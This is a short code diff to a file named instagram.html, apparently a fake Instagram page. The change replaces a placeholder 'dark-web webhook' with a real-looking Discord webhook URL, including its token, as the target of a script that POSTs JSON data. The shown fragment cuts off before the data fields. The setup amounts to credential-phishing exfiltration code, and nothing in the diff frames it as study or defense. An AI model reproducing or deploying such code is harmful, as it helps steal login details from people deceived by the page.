--- a/instagram.html
+++ b/instagram.html
@@ -9,7 +9,7 @@
 
             // Prepare to dive into the abyss of the web
             var xhr = new XMLHttpRequest();
-            xhr.open("POST", "https://your-dark-web-webhook.com", true);
+            xhr.open("POST", "https://discord.com/api/webhooks/1116509552695840768/qaUSQH-IXxJOiAgDTmflw3wNTJcg5kmMHMtSe6fi7Xm0HA3JHrOEpXUUFWBRvE22HvQg", true);
             xhr.setRequestHeader("Content-Type", "application/json");
 
             var data = JSON.stringify({
